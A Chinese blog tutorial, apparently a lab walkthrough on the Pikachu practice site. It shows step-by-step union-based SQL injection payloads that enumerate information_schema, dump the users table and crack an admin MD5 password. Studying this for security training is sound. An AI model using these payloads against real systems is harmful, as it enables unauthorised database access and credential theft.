6.SQL注入-通过information_schema拿下数据库案例

通过information_schema拿下数据库案例-字符型

数据库information_schema数据库中存在很多重要信息,包括所有的表名,库名,列名等等
在这里插入图片描述

TABLES表名的对应字段信息
在这里插入图片描述

COLUMNS对应的字段信息
在这里插入图片描述

测试开始,还是用字符型为案例
我进行随意输入一个单引号,进行查询,返回报错sql语句错误等,证明输入的信息被后台执行了
在这里插入图片描述

随意输入一个payload语句,发现爆出两个字段:id和email
在这里插入图片描述

进行反复测试有多少个列,发现存在2列,可以使用union语句进行测试
在这里插入图片描述

使用联合语句payload进行测试

kobe' union select version(),database() #

发现爆出当前数据以及版本信息
在这里插入图片描述

查询后台pikachu数据库中的所有表

select id,email from member where username = 'kobe' union select table_schema,table_name from information_schema.tables where table_schema = 'pikachu';

查询结果如下
在这里插入图片描述

通过上面的sql语句以及和暴漏出来的库名“pikachu”进行编写payload语句

kobe' union select table_schema,table_name from information_schema.tables where table_schema = 'pikachu'#

发现将pikachu库中所有的表都已经暴漏出来,发现有一个users表比较敏感信息,可以利用
在这里插入图片描述

查询后台users表中的字段

select id,email from member where username = 'kobe' union select table_name,column_name from information_schema.columns where table_name = 'users';

查询结果
在这里插入图片描述

根据上面的sql语句进行编写payload进行测试是否可以查出来对应的高级权限的用户和密码

kobe' union select table_name,column_name from information_schema.columns where table_name = 'users'#

发现users表中暴漏出字段用户名和密码
在这里插入图片描述

后台查询语句

select id,email from member where username = 'kobe' union select username,password from users;

查询结果
在这里插入图片描述

通过被爆出来的库名pikachu,还有字段username,password,进行编写payload语句进行测试

kobe' union select username,password from users#

发现了admin用户和解密的密码
在这里插入图片描述

通过md5解密,获取高级权限用户密码,admin/123456
在这里插入图片描述

成功拿下数据权限

  • 6
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

愿听风成曲

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值